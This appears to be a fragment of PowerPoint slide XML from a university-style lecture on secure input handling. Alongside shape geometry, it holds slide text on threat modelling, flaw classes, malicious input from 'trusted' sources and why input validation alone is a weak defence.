              <a:gd name="connsiteY10" fmla="*/ 1228507 h 12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4779" h="1228507">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="107029" y="88415"/>
                  <a:pt x="214058" y="176831"/>
                  <a:pt x="265246" y="314107"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="316434" y="451383"/>
                  <a:pt x="255939" y="727099"/>
                  <a:pt x="307127" y="823658"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="358315" y="920217"/>
                  <a:pt x="459527" y="923706"/>
                  <a:pt x="572373" y="893459"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="685219" y="863212"/>
                  <a:pt x="952791" y="725936"/>
                  <a:pt x="984202" y="642174"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1015613" y="558412"/>
                  <a:pt x="710813" y="439749"/>
                  <a:pt x="760837" y="390888"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="810861" y="342027"/>
                  <a:pt x="1123805" y="325740"/>
                  <a:pt x="1284348" y="349007"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1444891" y="372274"/>
                  <a:pt x="1707811" y="478140"/>
                  <a:pt x="1724098" y="530491"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1740385" y="582842"/>
                  <a:pt x="1460015" y="593312"/>
                  <a:pt x="1382070" y="663114"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1304125" y="732916"/>
                  <a:pt x="1278532" y="855069"/>
                  <a:pt x="1256428" y="949301"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1234324" y="1043533"/>
                  <a:pt x="1241885" y="1136020"/>
                  <a:pt x="1249447" y="1228507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2986915" y="2881089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2" name="Vrije vorm 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3103310" y="2833894"/>
            <a:ext cx="2118106" cy="955146"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 2115143"/>
              <a:gd name="connsiteY0" fmla="*/ 296889 h 864657"/>
              <a:gd name="connsiteX1" fmla="*/ 495591 w 2115143"/>
              <a:gd name="connsiteY1" fmla="*/ 282929 h 864657"/>
              <a:gd name="connsiteX2" fmla="*/ 488611 w 2115143"/>
              <a:gd name="connsiteY2" fmla="*/ 101445 h 864657"/>
              <a:gd name="connsiteX3" fmla="*/ 677075 w 2115143"/>
              <a:gd name="connsiteY3" fmla="*/ 3723 h 864657"/>
              <a:gd name="connsiteX4" fmla="*/ 1040043 w 2115143"/>
              <a:gd name="connsiteY4" fmla="*/ 227087 h 864657"/>
              <a:gd name="connsiteX5" fmla="*/ 732916 w 2115143"/>
              <a:gd name="connsiteY5" fmla="*/ 415552 h 864657"/>
              <a:gd name="connsiteX6" fmla="*/ 1326229 w 2115143"/>
              <a:gd name="connsiteY6" fmla="*/ 478373 h 864657"/>
              <a:gd name="connsiteX7" fmla="*/ 1605435 w 2115143"/>
              <a:gd name="connsiteY7" fmla="*/ 108425 h 864657"/>
              <a:gd name="connsiteX8" fmla="*/ 1877661 w 2115143"/>
              <a:gd name="connsiteY8" fmla="*/ 87484 h 864657"/>
              <a:gd name="connsiteX9" fmla="*/ 2114987 w 2115143"/>
              <a:gd name="connsiteY9" fmla="*/ 338770 h 864657"/>
              <a:gd name="connsiteX10" fmla="*/ 1842761 w 2115143"/>
              <a:gd name="connsiteY10" fmla="*/ 492333 h 864657"/>
              <a:gd name="connsiteX11" fmla="*/ 1598455 w 2115143"/>
              <a:gd name="connsiteY11" fmla="*/ 562135 h 864657"/>
              <a:gd name="connsiteX12" fmla="*/ 1437912 w 2115143"/>
              <a:gd name="connsiteY12" fmla="*/ 736639 h 864657"/>
              <a:gd name="connsiteX13" fmla="*/ 1633356 w 2115143"/>
              <a:gd name="connsiteY13" fmla="*/ 855301 h 864657"/>
              <a:gd name="connsiteX14" fmla="*/ 2073106 w 2115143"/>
              <a:gd name="connsiteY14" fmla="*/ 848321 h 8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5143" h="864657">
                <a:moveTo>
                  <a:pt x="0" y="296889"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="207078" y="306196"/>
                  <a:pt x="414156" y="315503"/>
                  <a:pt x="495591" y="282929"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="577026" y="250355"/>
                  <a:pt x="458364" y="147979"/>
                  <a:pt x="488611" y="101445"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="518858" y="54911"/>
                  <a:pt x="585170" y="-17217"/>
                  <a:pt x="677075" y="3723"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="768980" y="24663"/>
                  <a:pt x="1030736" y="158449"/>
                  <a:pt x="1040043" y="227087"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1049350" y="295725"/>
                  <a:pt x="685218" y="373671"/>
                  <a:pt x="732916" y="415552"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="780614" y="457433"/>
                  <a:pt x="1180809" y="529561"/>
                  <a:pt x="1326229" y="478373"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1471649" y="427185"/>
                  <a:pt x="1513530" y="173573"/>
                  <a:pt x="1605435" y="108425"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1697340" y="43277"/>
                  <a:pt x="1792736" y="49093"/>
                  <a:pt x="1877661" y="87484"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1962586" y="125875"/>
                  <a:pt x="2120804" y="271295"/>
                  <a:pt x="2114987" y="338770"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2109170" y="406245"/>
                  <a:pt x="1928850" y="455106"/>
                  <a:pt x="1842761" y="492333"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1756672" y="529560"/>
                  <a:pt x="1665930" y="521417"/>
                  <a:pt x="1598455" y="562135"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1530980" y="602853"/>
                  <a:pt x="1432095" y="687778"/>
                  <a:pt x="1437912" y="736639"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1443729" y="785500"/>
                  <a:pt x="1527490" y="836687"/>
                  <a:pt x="1633356" y="855301"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1739222" y="873915"/>
                  <a:pt x="1906164" y="861118"/>
                  <a:pt x="2073106" y="848321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" name="Vrije vorm 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3120225" y="2216625"/>
            <a:ext cx="3066176" cy="872279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" name="Right Arrow 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2016351" y="2992872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6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 Audience poll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i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How should you defend against input problems?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Probably NOT by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> input validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="5715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Probably NOT by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>input sanitisation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="5715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r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Thinking that input validation and input sanitisation are the best defences are a common misunderstanding; reasons behind this should be clearer by end of next week.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="5715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4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6246813"/>
            <a:ext cx="3803650" cy="469900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738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 and next week</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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5800" y="1412775"/>
            <a:ext cx="7761288" cy="467211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Threat modelling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Classifications of security flaws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all the other bug classes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Secure input handling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more structural prevention of input handling problems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772539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6225"/>
            <a:ext cx="7907536" cy="845345"/>
          </a:xfrm>
        </p:spPr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Expect the unexpected!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052736"/>
            <a:ext cx="7761288" cy="503215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Malicious input can come from unexpected, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘trusted’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>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Structurally handling input securely, using the ways we discuss over the next two weeks, minimizes such risks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40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" dirty="0"/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25615" r="13767" b="24757"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1518181" y="1844824"/>
            <a:ext cx="1948142" cy="10065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63" y="1577645"/>
            <a:ext cx="2247517" cy="30661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400" y="2851364"/>
            <a:ext cx="2346490" cy="23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2-nd order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41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Afgeronde rechthoek 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2548845" y="1595378"/>
            <a:ext cx="2876580" cy="29660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6216245" y="1831274"/>
            <a:ext cx="1810263" cy="20200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pic>
        <p:nvPicPr>
          <p:cNvPr id="8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8" y="1862614"/>
            <a:ext cx="774968" cy="7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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1574042" y="2094206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236502" y="1798051"/>
            <a:ext cx="1517522" cy="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473172" y="2009636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5374871" y="2289907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" name="Afgeronde rechthoek 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6235661" y="3971375"/>
            <a:ext cx="1770098" cy="167648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5" name="Vrije vorm 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2616217" y="1831274"/>
            <a:ext cx="2810780" cy="691410"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 2910724"/>
              <a:gd name="connsiteY0" fmla="*/ 434521 h 785713"/>
              <a:gd name="connsiteX1" fmla="*/ 216385 w 2910724"/>
              <a:gd name="connsiteY1" fmla="*/ 448481 h 785713"/>
              <a:gd name="connsiteX2" fmla="*/ 376928 w 2910724"/>
              <a:gd name="connsiteY2" fmla="*/ 357739 h 785713"/>
              <a:gd name="connsiteX3" fmla="*/ 272226 w 2910724"/>
              <a:gd name="connsiteY3" fmla="*/ 197195 h 785713"/>
              <a:gd name="connsiteX4" fmla="*/ 369948 w 2910724"/>
              <a:gd name="connsiteY4" fmla="*/ 8731 h 785713"/>
              <a:gd name="connsiteX5" fmla="*/ 614254 w 2910724"/>
              <a:gd name="connsiteY5" fmla="*/ 57592 h 785713"/>
              <a:gd name="connsiteX6" fmla="*/ 593313 w 2910724"/>
              <a:gd name="connsiteY6" fmla="*/ 287937 h 785713"/>
              <a:gd name="connsiteX7" fmla="*/ 607273 w 2910724"/>
              <a:gd name="connsiteY7" fmla="*/ 490362 h 785713"/>
              <a:gd name="connsiteX8" fmla="*/ 746876 w 2910724"/>
              <a:gd name="connsiteY8" fmla="*/ 546203 h 785713"/>
              <a:gd name="connsiteX9" fmla="*/ 921380 w 2910724"/>
              <a:gd name="connsiteY9" fmla="*/ 392640 h 785713"/>
              <a:gd name="connsiteX10" fmla="*/ 1158705 w 2910724"/>
              <a:gd name="connsiteY10" fmla="*/ 636945 h 785713"/>
              <a:gd name="connsiteX11" fmla="*/ 1577515 w 2910724"/>
              <a:gd name="connsiteY11" fmla="*/ 427541 h 785713"/>
              <a:gd name="connsiteX12" fmla="*/ 1828800 w 2910724"/>
              <a:gd name="connsiteY12" fmla="*/ 546203 h 785713"/>
              <a:gd name="connsiteX13" fmla="*/ 2198748 w 2910724"/>
              <a:gd name="connsiteY13" fmla="*/ 643925 h 785713"/>
              <a:gd name="connsiteX14" fmla="*/ 2198748 w 2910724"/>
              <a:gd name="connsiteY14" fmla="*/ 127394 h 785713"/>
              <a:gd name="connsiteX15" fmla="*/ 2457014 w 2910724"/>
              <a:gd name="connsiteY15" fmla="*/ 57592 h 785713"/>
              <a:gd name="connsiteX16" fmla="*/ 2638498 w 2910724"/>
              <a:gd name="connsiteY16" fmla="*/ 225116 h 785713"/>
              <a:gd name="connsiteX17" fmla="*/ 2561716 w 2910724"/>
              <a:gd name="connsiteY17" fmla="*/ 420560 h 785713"/>
              <a:gd name="connsiteX18" fmla="*/ 2415133 w 2910724"/>
              <a:gd name="connsiteY18" fmla="*/ 560163 h 785713"/>
              <a:gd name="connsiteX19" fmla="*/ 2624537 w 2910724"/>
              <a:gd name="connsiteY19" fmla="*/ 762588 h 785713"/>
              <a:gd name="connsiteX20" fmla="*/ 2840922 w 2910724"/>
              <a:gd name="connsiteY20" fmla="*/ 783528 h 785713"/>
              <a:gd name="connsiteX21" fmla="*/ 2910724 w 2910724"/>
              <a:gd name="connsiteY21" fmla="*/ 783528 h 7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10724" h="785713">
                <a:moveTo>
                  <a:pt x="0" y="434521"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="76782" y="447899"/>
                  <a:pt x="153564" y="461278"/>
                  <a:pt x="216385" y="448481"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="279206" y="435684"/>
                  <a:pt x="367621" y="399620"/>
                  <a:pt x="376928" y="357739"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="386235" y="315858"/>
                  <a:pt x="273389" y="255363"/>
                  <a:pt x="272226" y="197195"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="271063" y="139027"/>
                  <a:pt x="312943" y="31998"/>
                  <a:pt x="369948" y="8731"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="426953" y="-14536"/>
                  <a:pt x="577027" y="11058"/>
                  <a:pt x="614254" y="57592"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="651482" y="104126"/>
                  <a:pt x="594477" y="215809"/>
                  <a:pt x="593313" y="287937"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="592150" y="360065"/>
                  <a:pt x="581679" y="447318"/>
                  <a:pt x="607273" y="490362"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="632867" y="533406"/>
                  <a:pt x="694525" y="562490"/>
                  <a:pt x="746876" y="546203"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="799227" y="529916"/>
                  <a:pt x="852742" y="377516"/>
                  <a:pt x="921380" y="392640"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="990018" y="407764"/>
                  <a:pt x="1049349" y="631128"/>
                  <a:pt x="1158705" y="636945"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1268061" y="642762"/>
                  <a:pt x="1465833" y="442665"/>
                  <a:pt x="1577515" y="427541"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1689198" y="412417"/>
                  <a:pt x="1725261" y="510139"/>
                  <a:pt x="1828800" y="546203"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1932339" y="582267"/>
                  <a:pt x="2137090" y="713727"/>
                  <a:pt x="2198748" y="643925"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2260406" y="574124"/>
                  <a:pt x="2155704" y="225116"/>
                  <a:pt x="2198748" y="127394"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2241792" y="29672"/>
                  <a:pt x="2383722" y="41305"/>
                  <a:pt x="2457014" y="57592"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2530306" y="73879"/>
                  <a:pt x="2621048" y="164621"/>
                  <a:pt x="2638498" y="225116"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2655948" y="285611"/>
                  <a:pt x="2598944" y="364719"/>
                  <a:pt x="2561716" y="420560"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2524489" y="476401"/>
                  <a:pt x="2404663" y="503158"/>
                  <a:pt x="2415133" y="560163"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2425603" y="617168"/>
                  <a:pt x="2553572" y="725361"/>
                  <a:pt x="2624537" y="762588"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2695502" y="799815"/>
                  <a:pt x="2793224" y="780038"/>
                  <a:pt x="2840922" y="783528"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2888620" y="787018"/>
                  <a:pt x="2899672" y="785273"/>
                  <a:pt x="2910724" y="78352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0" name="Rechthoek 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6192924" y="2339292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1" name="Rechthoek 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5334620" y="2899585"/>
            <a:ext cx="136120" cy="43261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2" name="Rechthoek 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6175806" y="2932539"/>
            <a:ext cx="148212" cy="481558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8" name="Right Arrow 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5448037" y="2957253"/>
            <a:ext cx="717331" cy="3823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37" name="Right Arrow 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5522009" y="2381719"/>
            <a:ext cx="713652" cy="3823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3" name="Rechthoek 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5723155" y="2476788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4" name="Rechthoek 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5751273" y="3058090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7" name="Rechthoek 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6165368" y="4390516"/>
            <a:ext cx="155505" cy="52261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Explosie 2 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="5910760" y="4494240"/>
            <a:ext cx="698614" cy="334044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6" name="Right Arrow 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="2399366">
            <a:off x="5309910" y="4055788"/>
            <a:ext cx="919167" cy="3540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8" name="Rechthoek 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="2400000">
            <a:off x="5722332" y="4191314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8" name="Vrije vorm 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3037589" y="2752630"/>
            <a:ext cx="2316188" cy="1654077"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 2316188 w 2316188"/>
              <a:gd name="connsiteY0" fmla="*/ 409379 h 2387001"/>
              <a:gd name="connsiteX1" fmla="*/ 1708915 w 2316188"/>
              <a:gd name="connsiteY1" fmla="*/ 276756 h 2387001"/>
              <a:gd name="connsiteX2" fmla="*/ 1171443 w 2316188"/>
              <a:gd name="connsiteY2" fmla="*/ 46411 h 2387001"/>
              <a:gd name="connsiteX3" fmla="*/ 431547 w 2316188"/>
              <a:gd name="connsiteY3" fmla="*/ 32451 h 2387001"/>
              <a:gd name="connsiteX4" fmla="*/ 780555 w 2316188"/>
              <a:gd name="connsiteY4" fmla="*/ 402399 h 2387001"/>
              <a:gd name="connsiteX5" fmla="*/ 1548371 w 2316188"/>
              <a:gd name="connsiteY5" fmla="*/ 597843 h 2387001"/>
              <a:gd name="connsiteX6" fmla="*/ 1443669 w 2316188"/>
              <a:gd name="connsiteY6" fmla="*/ 1051553 h 2387001"/>
              <a:gd name="connsiteX7" fmla="*/ 1297086 w 2316188"/>
              <a:gd name="connsiteY7" fmla="*/ 1875211 h 2387001"/>
              <a:gd name="connsiteX8" fmla="*/ 808475 w 2316188"/>
              <a:gd name="connsiteY8" fmla="*/ 2384762 h 2387001"/>
              <a:gd name="connsiteX9" fmla="*/ 117440 w 2316188"/>
              <a:gd name="connsiteY9" fmla="*/ 2035755 h 2387001"/>
              <a:gd name="connsiteX10" fmla="*/ 12738 w 2316188"/>
              <a:gd name="connsiteY10" fmla="*/ 1442442 h 2387001"/>
              <a:gd name="connsiteX11" fmla="*/ 257043 w 2316188"/>
              <a:gd name="connsiteY11" fmla="*/ 1365660 h 2387001"/>
              <a:gd name="connsiteX12" fmla="*/ 494368 w 2316188"/>
              <a:gd name="connsiteY12" fmla="*/ 1512243 h 2387001"/>
              <a:gd name="connsiteX13" fmla="*/ 682832 w 2316188"/>
              <a:gd name="connsiteY13" fmla="*/ 1861251 h 2387001"/>
              <a:gd name="connsiteX14" fmla="*/ 1304066 w 2316188"/>
              <a:gd name="connsiteY14" fmla="*/ 1875211 h 2387001"/>
              <a:gd name="connsiteX15" fmla="*/ 2281287 w 2316188"/>
              <a:gd name="connsiteY15" fmla="*/ 1749568 h 23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16188" h="2387001">
                <a:moveTo>
                  <a:pt x="2316188" y="409379"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="2107947" y="373315"/>
                  <a:pt x="1899706" y="337251"/>
                  <a:pt x="1708915" y="276756"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1518124" y="216261"/>
                  <a:pt x="1384338" y="87129"/>
                  <a:pt x="1171443" y="46411"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="958548" y="5693"/>
                  <a:pt x="496695" y="-26880"/>
                  <a:pt x="431547" y="32451"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="366399" y="91782"/>
                  <a:pt x="594418" y="308167"/>
                  <a:pt x="780555" y="402399"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="966692" y="496631"/>
                  <a:pt x="1437852" y="489651"/>
                  <a:pt x="1548371" y="597843"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1658890" y="706035"/>
                  <a:pt x="1485550" y="838658"/>
                  <a:pt x="1443669" y="1051553"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1401788" y="1264448"/>
                  <a:pt x="1402952" y="1653010"/>
                  <a:pt x="1297086" y="1875211"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1191220" y="2097412"/>
                  <a:pt x="1005083" y="2358005"/>
                  <a:pt x="808475" y="2384762"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="611867" y="2411519"/>
                  <a:pt x="250063" y="2192808"/>
                  <a:pt x="117440" y="2035755"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-15183" y="1878702"/>
                  <a:pt x="-10529" y="1554124"/>
                  <a:pt x="12738" y="1442442"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="36005" y="1330760"/>
                  <a:pt x="176771" y="1354027"/>
                  <a:pt x="257043" y="1365660"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="337315" y="1377293"/>
                  <a:pt x="423403" y="1429645"/>
                  <a:pt x="494368" y="1512243"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="565333" y="1594841"/>
                  <a:pt x="547882" y="1800756"/>
                  <a:pt x="682832" y="1861251"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="817782" y="1921746"/>
                  <a:pt x="1037657" y="1893825"/>
                  <a:pt x="1304066" y="1875211"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1570475" y="1856597"/>
                  <a:pt x="1925881" y="1803082"/>
                  <a:pt x="2281287" y="174956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4" name="Vrije vorm 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6324018" y="2273203"/>
            <a:ext cx="1508349" cy="1385818"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 20941 w 1508349"/>
              <a:gd name="connsiteY0" fmla="*/ 337374 h 1385818"/>
              <a:gd name="connsiteX1" fmla="*/ 181484 w 1508349"/>
              <a:gd name="connsiteY1" fmla="*/ 23267 h 1385818"/>
              <a:gd name="connsiteX2" fmla="*/ 446730 w 1508349"/>
              <a:gd name="connsiteY2" fmla="*/ 23267 h 1385818"/>
              <a:gd name="connsiteX3" fmla="*/ 998162 w 1508349"/>
              <a:gd name="connsiteY3" fmla="*/ 30247 h 1385818"/>
              <a:gd name="connsiteX4" fmla="*/ 1319249 w 1508349"/>
              <a:gd name="connsiteY4" fmla="*/ 16287 h 1385818"/>
              <a:gd name="connsiteX5" fmla="*/ 1500733 w 1508349"/>
              <a:gd name="connsiteY5" fmla="*/ 120989 h 1385818"/>
              <a:gd name="connsiteX6" fmla="*/ 1472813 w 1508349"/>
              <a:gd name="connsiteY6" fmla="*/ 393215 h 1385818"/>
              <a:gd name="connsiteX7" fmla="*/ 1458852 w 1508349"/>
              <a:gd name="connsiteY7" fmla="*/ 916727 h 1385818"/>
              <a:gd name="connsiteX8" fmla="*/ 1095884 w 1508349"/>
              <a:gd name="connsiteY8" fmla="*/ 546779 h 1385818"/>
              <a:gd name="connsiteX9" fmla="*/ 1012122 w 1508349"/>
              <a:gd name="connsiteY9" fmla="*/ 923707 h 1385818"/>
              <a:gd name="connsiteX10" fmla="*/ 1319249 w 1508349"/>
              <a:gd name="connsiteY10" fmla="*/ 1119151 h 1385818"/>
              <a:gd name="connsiteX11" fmla="*/ 1207567 w 1508349"/>
              <a:gd name="connsiteY11" fmla="*/ 1335536 h 1385818"/>
              <a:gd name="connsiteX12" fmla="*/ 711976 w 1508349"/>
              <a:gd name="connsiteY12" fmla="*/ 1377417 h 1385818"/>
              <a:gd name="connsiteX13" fmla="*/ 544452 w 1508349"/>
              <a:gd name="connsiteY13" fmla="*/ 1209893 h 1385818"/>
              <a:gd name="connsiteX14" fmla="*/ 802718 w 1508349"/>
              <a:gd name="connsiteY14" fmla="*/ 923707 h 1385818"/>
              <a:gd name="connsiteX15" fmla="*/ 921380 w 1508349"/>
              <a:gd name="connsiteY15" fmla="*/ 784104 h 1385818"/>
              <a:gd name="connsiteX16" fmla="*/ 725936 w 1508349"/>
              <a:gd name="connsiteY16" fmla="*/ 658461 h 1385818"/>
              <a:gd name="connsiteX17" fmla="*/ 502571 w 1508349"/>
              <a:gd name="connsiteY17" fmla="*/ 819005 h 1385818"/>
              <a:gd name="connsiteX18" fmla="*/ 279206 w 1508349"/>
              <a:gd name="connsiteY18" fmla="*/ 916727 h 1385818"/>
              <a:gd name="connsiteX19" fmla="*/ 0 w 1508349"/>
              <a:gd name="connsiteY19" fmla="*/ 902766 h 13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8349" h="1385818">
                <a:moveTo>
                  <a:pt x="20941" y="337374"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="65730" y="206496"/>
                  <a:pt x="110519" y="75618"/>
                  <a:pt x="181484" y="23267"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="252449" y="-29084"/>
                  <a:pt x="446730" y="23267"/>
                  <a:pt x="446730" y="23267"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="998162" y="30247"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1143582" y="29084"/>
                  <a:pt x="1235487" y="1163"/>
                  <a:pt x="1319249" y="16287"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1403011" y="31411"/>
                  <a:pt x="1475139" y="58168"/>
                  <a:pt x="1500733" y="120989"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1526327" y="183810"/>
                  <a:pt x="1479793" y="260592"/>
